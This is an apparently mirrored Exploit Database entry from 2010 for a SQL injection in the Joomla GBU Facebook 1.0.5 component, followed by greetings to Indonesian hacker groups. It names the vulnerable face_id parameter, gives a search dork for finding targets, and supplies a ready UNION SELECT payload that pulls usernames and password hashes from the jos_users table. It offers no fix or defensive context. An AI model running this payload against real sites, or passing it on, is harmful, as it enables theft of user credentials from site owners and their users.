Joomla! Component GBU Facebook 1.0.5 – SQL Injection

• Exploit Database
• 11 阅读

• 作者： kaMtiEz
  日期： 2010-04-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12299/

• [!]===========================================================================[!]
  
  [~] Joomla Component GBU FACEBOOK SQL injection vulnerability 
  [~] Author	: kaMtiEz (kamzcrew@yahoo.com)
  [~] Homepage	: http://www.indonesiancoder.com
  [~] Date	: 20 april, 2010
  
  [!]===========================================================================[!]
  
  [ Software Information ]
  
  [+] Vendor : http://www.gbugrafici.nl/gbufacebook/
  [+] Price : free
  [+] Vulnerability : SQL
  [+] Dork : inurl:"CIHUY" ;)
  [+] Download : http://www.gbugrafici.nl/gbufacebook/com_gbufacebook.zip
  [+] Version : 1.0.5 or lower maybe also affected
  
  
  [!]===========================================================================[!]
  
  [ Vulnerable File ]
  
  http://127.0.0.1/index.php?option=com_gbufacebook&task=show_face&face_id=[INDONESIANCODER]
  
  [ XpL ]
  
  -999.9'+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz
  
  etc etc etc ;]
  
  [!]===========================================================================[!]
  
  [ Thx TO ]
  
  [+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
  [+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
  [+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
  [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4
  
  
  [ NOTE ] 
  
  [+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
  [+] jika kami bersama nyalakan tanda bahaya :)
  [+] Ayy : Ceped sembuh bebh .. lup u :">
  [+] Don Tukulesto and Acild : thanks for coming in my t0wn :D
  
  [ QUOTE ]
  
  [+] INDONESIANCODER still r0x
  [+] nothing secure ..